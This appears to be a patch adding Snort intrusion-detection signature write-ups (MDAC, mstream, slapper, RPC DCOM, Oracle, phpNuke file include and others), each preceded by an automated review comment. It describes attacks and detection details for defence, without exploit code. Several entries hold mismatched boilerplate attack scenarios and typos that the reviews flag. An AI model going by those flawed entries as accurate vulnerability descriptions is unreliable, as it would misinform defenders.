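Review bot: Attack Scenarios says "A local attacker", but the Summary describes a network attack against an ftp server and Detailed Information says the overflow comes from directories "created by users", so the attacker is any remote FTP user with write access (including anonymous, if the server allows uploads); reword accordingly. Affected Systems lists NcFTPD 2.3.5 although the text only describes the wu-ftpd bug, so either explain why NcFTPD is included or remove it. The file's layout differs from every other document (SID before Rule, "--" separators before the blank lines, final heading "References" instead of "Additional References"), which will break anything that parses these files consistently. Wording: "very log directory names" should be "very long", Impact reads "as with elevated user privileges", and "insufficent", "wich" and "susspect" are misspelt.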
--- /dev/null
+++ b/doc/signatures/2329.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2329
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Windows Data Access Components.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible. Denial of Service
+(DoS)
+
+--
+Detailed Information:
+It may be possible for an attacker to send a specially crafted response
+to a client broadcast query searching for an SQL server. This response
+could take advantage of a buffer overrun condition in an MDAC component
+which may result in the attacker being presented with the opportunity to 
+execute code of their choosing with the privileges of the user running
+the service on the client system.
+
+A DoS condition may also manifest in MDAC version 2.8.
+
+MDAC is included by default on many Microsoft Windows systems. Client
+workstations may make regular broadcast announcements in an attempt to
+find SQL servers.
+
+--
+Affected Systems:
+	Microsoft Data Access Components 2.5
+	Microsoft Data Access Components 2.6
+	Microsoft Data Access Components 2.7
+	Microsoft Data Access Components 2.8
+
+--
+Attack Scenarios:
+The attacker may spoof the response from an SQL server to exploit the
+vulnerability.
+
+--
+Ease of Attack:
+Moderate..
+
+--
+False Positives:
+Since this rule cannot be constrained using ports and the connection
+state for MSDAC is not tracked, false positive events may occur under
+normal circumstances. The $SQL_SERVERS variable in snort.conf should be
+configured correctly to eliminate this behavior.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Disallow access to database servers from sources external to the
+protected network.
+
+Disallow access to database servers from untrusted hosts.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
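Review bot: Corrective Action does not match the attack: Detailed Information says the vulnerable code is on the client, triggered by a spoofed response to the client's broadcast query for SQL servers, so "Disallow access to database servers from external sources" does nothing against an attacker answering that broadcast; the relevant control is blocking unsolicited responses from outside to the port the clients listen on, and it is worth saying whether the broadcast discovery can be switched off on the client. Naming that port would also help the False Positives guidance, which says the rule "cannot be constrained using ports". Ease of Attack ends with "Moderate..", and Additional References is empty despite four specific MDAC versions being listed.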
--- /dev/null
+++ b/doc/signatures/244.txt
@@ -0,0 +1,57 @@
+Rule:
+--
+Sid:
+244
+
+--
+Summary:
+This event is generated when a DDoS mstream handler directs an mstream agent to begin an attack against a specified target. 
+
+--
+Impactn:
+Severe. If the listed source IP is in your network, it may be an mstream handler.  If the listed destination IP is in your network, it may be an mstream agent.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.  There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  A handler can direct a particular agent to attack a target. It directs the agent by sending it a UDP packet to destination port 10498 with a string of "stream/" in the payload.  The target IP and duration of the attack will also be included in the payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+After a host becomes an mstream agent, it will likely be directed to participate in a DDoS attack.
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There are other known handler-to-agent ports in addition to 10498.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
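Review bot: the section heading "Impactn:" is misspelt, which will break any tooling that splits these files on the standard section names; fix it to "Impact:". False Negatives says "There are other known handler-to-agent ports in addition to 10498" without listing them, so an analyst cannot tune for them; list the ports, as 1889.txt does for slapper. Detailed Information already gives the concrete match (UDP to destination port 10498 with "stream/" in the payload), so the Summary could state the same in one line.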
--- /dev/null
+++ b/doc/signatures/1889.txt
@@ -0,0 +1,56 @@
+Nigel, Removed isc.incidents.org reference since it is no longer active.
+Rule:
+
+--
+Sid:
+1889
+
+--
+Summary:
+This event is generated when a web server infected by the slapper worm attempts to send traffic via a communication channel. 
+
+--
+Impact:
+Remote access and potentially denial of service.  A slapper worm infection indicates a successful compromise of the host.  A communication channel established between infected hosts can be used as a vehicle for a distributed denial of service attack of a target host or network.
+
+--
+Detailed Information:
+The Apache/mod_ssl worm, also known as slapper, exploits a vulnerability associated with certain versions of OpenSSL.  Once a host has been infected by the worm, the worm then attempts to establish a communication channel using UDP port 2002 (both source and destination) to the infecting host.  This communication channel is used to create a network for infected hosts to communicate with each other to identify other infected hosts and to deliver attack instructions for other sites.
+
+--
+Affected Systems:
+Linux hosts running Apache with mod_ssl using SSLv2-enabled OpenSSL 0.9.6d or earlier on Intel x86 architectures.
+
+--
+Attack Scenarios:
+The communication channel created by the slapper worm allows infected hosts to receive direction from other infected hosts.  This can be used, for instance, to coordinate a DDoS attack.
+
+--
+Ease of Attack:
+Simple.  Exploit code exists. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It has been observed that the port number for the communication channel may vary.  Ports 1978 and 4156 have also been seen.
+
+--
+Corrective Action:
+Apply the appropriate patch or upgrade to the most current version of OpenSSL.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT
+http://www.cert.org/advisories/CA-2002-27.html
+
+--
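Review bot: the first line, "Nigel, Removed isc.incidents.org reference since it is no longer active.", is an editorial note to a person that was committed into the documentation file ahead of "Rule:"; remove it. Corrective Action only says to patch OpenSSL, but the Summary and Impact say the event means the host is already infected; add the cleanup steps used elsewhere in this set (forensic analysis, then rebuild of the compromised host) before patching. False Negatives names ports 1978 and 4156 as also seen; say whether this rule covers them or whether separate rules exist.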
--- /dev/null
+++ b/doc/signatures/100000172.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+100000172
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Lynx text-based web browser.
+
+-- 
+Impact: 
+Code execution on the victim machine with the privileges of the user running 
+Lynx.
+
+--
+Detailed Information:
+A vulnerability exists in the way that Lynx handles links when browsing NNTP 
+resources. The function that handles the display of information from article 
+headers when listing available files on the server, inserts extra characters to 
+handle certain character sets. This function does not properly check how much 
+extra data is inserted and it is possible to overflow a static buffer and 
+execute code in the context of the browser process.
+
+--
+Affected Systems:
+Lynx versions 2.8.6 and prior
+
+--
+Attack Scenarios: 
+An attacker would need to supply a malicious link on an nntp server to the user 
+using Lynx.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Apply the appropriate patch.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Original advisory posting:
+http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html
+
+--
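Review bot: Attack Scenarios ("supply a malicious link on an nntp server to the user") does not match Detailed Information, which places the overflow in the code that formats article headers when listing a newsgroup; the attacker therefore needs the user to open an nntp:// URL for a server or group where the attacker controls article headers, and the crafted header, not a link, is the payload. "listing available files on the server" should be "listing articles", since NNTP serves articles, not files. Affected Systems "Lynx versions 2.8.6 and prior" should be checked against the advisory linked under Additional References, which is the right place for the exact fixed version.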
--- /dev/null
+++ b/doc/signatures/2589.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2589
+
+--
+Summary:
+This event is generated when an attempt is made to return to
+a web client a file in the Content-Disposition Header with a
+Class ID (CLSID) embedded in the file name.
+
+--
+Impact:
+A successful attack may trick a client on a vulnerable host to download
+a malicious file that will be executed by the Windows Shell.
+
+--
+Detailed Information:
+Internet Explorer does not correctly handle or display specially
+crafted files in the browser dialogue where the user choses the
+action (e.g., open, save, cancel) for a downloaded file.
+Specifically, these are overly long file names that employ URL
+encoding of "." %2E before the file extension and contain the
+Class ID (CLSID) associated with the Windows Shell in the file name.
+
+This serves two purposes; the first is that the file name will
+be truncated in the user dialog so the user doesn't see the
+CLSID reference, making it appear to be a more innocuous file
+with a known extension such as mpg or pdf.  Second, the downloaded
+file will actually contain malcious commands that will be
+executed by the Windows Shell when opened because of the hidden
+CLSID in the file name.
+
+Currently, the only known CLSID that exploits this vulnerability
+is associated with the Windows Shell.  Yet, it may be possible
+for another CLSID to be discovered in the future that would be
+associated with a COM component that could be used for malicious
+purposes.
+
+--
+Affected Systems:
+	Windows NT Workstation/Server 4.0 SP6a
+	Windows NT Workstation/Server 4.0 SP6a with Active Desktop
+	Windows NT Server 4.0 Terminal Server Edition SP6
+	Windows 2000 SP2-SP4
+	Windows XP and XP SP1
+	Windows XP 64-Bit Edition SP1
+	Windows XP 64-Bit Edition Version 2003
+	Windows Server 2003
+	Windows Server 2003 64-Bit Edition
+
+--
+Attack Scenarios:
+An attacker can entice a user to visit a web server that
+will return a malicious file with a file name that contains
+a CLSID, perhaps enabling the execution of the malicious
+code when the file is opened.
+
+--
+Ease of Attack:
+Simple. Exploit code is publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0420
+
+Bugtraq:
+http://www.securityfocus.com/bid/9510
+
+Other:
+http://www.microsoft.com/technet/security/bulletin/ms04-024.mspx
+
+--
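Review bot: Typos in Detailed Information: "where the user choses the" should read "chooses", and "file will actually contain malcious commands" should read "malicious". The "Additional References" header on the line before "CVE:" is missing the trailing colon that every other section header in this file and in the rest of the patch uses. The CVE link still uses the candidate form CAN-2004-0420; the entry is the same under its CVE-2004-0420 name, and the newer form is what readers will search for.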
--- /dev/null
+++ b/doc/signatures/100000382.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000382
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_users.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_users.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
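Review bot: The third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials ...") and the Attack Scenarios paragraph describe credential and authentication weaknesses, which is generic CGI boilerplate and does not match the remote file include through "phpbb_root_path" that the Summary and the first Detailed Information paragraph describe; the scenario should describe the file include itself. Typos: "running ona web server" should be "on a web server", and "attackers choosing" should be "attacker's choosing" in both Impact and Detailed Information. The file also opens with two empty lines before "Rule:", unlike the other signature docs in the patch.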
--- /dev/null
+++ b/doc/signatures/1784.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+
+1784
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "nude celeb".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "nude celeb".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
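Review bot: The Summary sentence is ungrammatical: "This rule indicates that a webpage was visited the included the content" should read "that included the content". Also "etc.etc." in False Positives, a missing blank line between "None known." and the following "--" in False Negatives (every other section has one), trailing whitespace on "Rule:  ", "Not an attack.  ", "Dependent on your company's policies.   " and "-- ", and seven empty lines under "Additional References:" that should collapse to one.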
--- /dev/null
+++ b/doc/signatures/2188.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2188
+
+--
+Summary:
+This event is generated when a suspicious packet using an unusual 
+protocol is sent to a router.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in multiple Cisco IOS versions such that a Denial
+of Service condition can be issued against a device by sending multiple 
+packets using IP protocols 53, 55, 77 and 103 directly to that device.
+
+Cisco IOS processes these packets and under certain circumstances, can 
+be made to incorrectly flag an input interface as being full.
+
+--
+Affected Systems:
+Multiple versions of Cisco IOS.
+
+--
+Attack Scenarios:
+An attacker may send a large number of IP packets using one of the 
+protocols 53, 55, 77 or 103 directly to a router. Exploit code exists.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
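Review bot: Additional References is empty although Detailed Information describes a specific Cisco IOS vulnerability (IP protocols 53, 55, 77 and 103 causing an input interface to be flagged as full) and Corrective Action tells the reader to apply vendor patches; the Cisco advisory and CVE entry should be cited so "Multiple versions of Cisco IOS" can be mapped to actual releases. Typo in Ease of Attack: "Expoit code exists" should be "Exploit code exists"; the same statement already closes Attack Scenarios and only needs to appear once.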
--- /dev/null
+++ b/doc/signatures/3308.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3308
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
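Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share.") contradicts Detailed Information, which describes a malformed DCOM request sent over RPC that overflows a buffer; the scenario text looks pasted from an SMB signature doc and should describe the malformed RPC request instead. Typo in Ease of Attack: "Expoit" should be "Exploit". Additional References is empty although this is a specific, patched Microsoft RPC DCOM issue; list the Microsoft bulletin and CVE entry as 2589.txt does, so readers can confirm the patch in Corrective Action.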
--- /dev/null
+++ b/doc/signatures/2721.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2721
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_columns_to_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
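Review bot: In Detailed Information the procedure name is split from its sentence by line breaks ("vulnerability in the procedure add_columns_to_flavor" / "." / "This procedure is included in"), which reads as a leftover from template substitution; it should be one sentence: "vulnerability in the procedure add_columns_to_flavor. This procedure is included in dbms_repcat." The package is given without the "sys." prefix that 2895.txt in this patch uses for the same family of procedures; pick one form. "Oracle Oracle9i" under Affected Systems repeats the vendor name, the two "None Known" lines and "Apply the appropriate vendor supplied patch" lack terminating periods, and "Rule: ", "Sid: ", "Summary: " and the "-- " separators carry trailing whitespace.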
--- /dev/null
+++ b/doc/signatures/100000321.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000321
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ScozNet ScozNews" application running on a 
+webserver. Access to the file "help.php" using a remote file being passed as 
+the "main_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "main_path" parameter in the "help.php" script used by 
+the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
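Review bot: The credential/authentication paragraphs in Detailed Information ("Some applications do not perform stringent checks when validating the credentials of a client host ...") and in Attack Scenarios are generic CGI boilerplate and do not describe the "main_path" remote file include in "help.php" that the Summary documents; the scenario should describe the remote include. Typos: "running ona web server" should be "on a web server", "attackers choosing" should be "attacker's choosing" (Impact and Detailed Information). The file opens with two empty lines before "Rule:" and ends with a stray empty line after the closing "--", unlike the other signature docs in the patch.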
--- /dev/null
+++ b/doc/signatures/2895.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2895
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_varchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
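Review bot: Same template artifact as 2721.txt in this patch: "drop_priority_varchar2" is separated from its period and from "This procedure is included in" by line breaks, so the Detailed Information paragraph should be joined into one sentence ending "included in sys.dbms_repcat_conf." "Oracle Oracle9i" repeats the vendor name under Affected Systems; the "None Known" lines and "Apply the appropriate vendor supplied patch" lack periods; "Rule: ", "Sid: " and the "-- " separators carry trailing whitespace.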
--- /dev/null
+++ b/doc/signatures/3043.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3043
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
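Review bot: Additional References is empty although Affected Systems pins the issue to "Ethereal 0.10.7 and prior" and Corrective Action says to apply the vendor patch; the Ethereal security advisory for that release and its CVE entry should be cited so the fixed version can be verified. The Attack Scenarios paragraph is a comma splice ("... containing large NT ACLs, the attacker then needs to specify ..."); split it into two sentences. Trailing whitespace on "Rule: ", "Sid: ", "Summary: ", "Impact: " and the "-- " separators.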
--- /dev/null
+++ b/doc/signatures/1599.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1599
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
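Review bot: The doc never says what request pattern sid 1599 matches: Summary, Detailed Information and Affected Systems ("All systems running CGI applications") would describe any CGI attack, so nothing distinguishes this entry from 1119.txt in the same patch and the "None known." False Positives claim cannot be judged; add a sentence naming the script or path the rule looks for. Typos: "running ona web server" should be "on a web server", and "attackers choosing" should be "attacker's choosing" in Impact and Detailed Information. The line "relationships between the victim server and other hosts can be exploited by the attacker." is not wrapped at the column width used by the rest of the file.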
--- /dev/null
+++ b/doc/signatures/301.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 301
+
+--
+Summary:
+This event is generated when an attempt is made to escalate privileges remotely using a vulnerability in LPRng.
+
+--
+Impact:
+System compromize presenting the attacker with escalated system privileges .
+
+--
+Detailed Information:
+LPRng is an implementation of the Berkeley lpr print spooling protocol. Some versions are vulnerable to a format-string attack that takes advantage of a bug in the syslog() wrapper. Successfull exploitation may present a remote attacker with the ability to execute arbitrary code using the privileges of the LPD daemon owner (typically root).
+
+Arbitrary addresses in the lpd process address space can be overwritten by sending specially crafted packets to the LPRng daemon listening on port 515 to execute arbitrary code or generate a segmentation violation.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disallow access to LPRng port 515 from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1712
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917
+
+--
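Review bot: The Affected Systems section is missing entirely (Detailed Information goes straight to Attack Scenarios), and Attack Scenarios ("Exploit scripts are available") states exploit availability, which is already in Ease of Attack, instead of a scenario; the scenario should be the crafted request to the lpd daemon on port 515 that Detailed Information describes. "Sid: 301" puts the number on the header line, unlike every other file in the patch. Typos in Impact and Detailed Information: "compromize" should be "compromise", there is a stray space in "escalated system privileges .", and "Successfull" should be "Successful".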
--- /dev/null
+++ b/doc/signatures/3456.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+3456
+
+-- 
+
+Summary: 
+This event is generated when the user "root" logs in to a MySQL database from an external source.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when someone using the name "root" logs in to a MySQL database.
+
+The 'root' user may have access to all databases on the system, with full privileges to add users, delete data, add information, etc.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. The user logs in with the username 'root', full access is then granted to that user for all databases served by the MySQL daemon. The attacker may then continue to gain sensitive information from any database in the system.
+
+-- 
+
+Ease of Attack: 
+Simple. This may be post-attack behavior and can be indicative of the successful exploitation of a vulnerable system.
+
+-- 
+
+False Positives: 
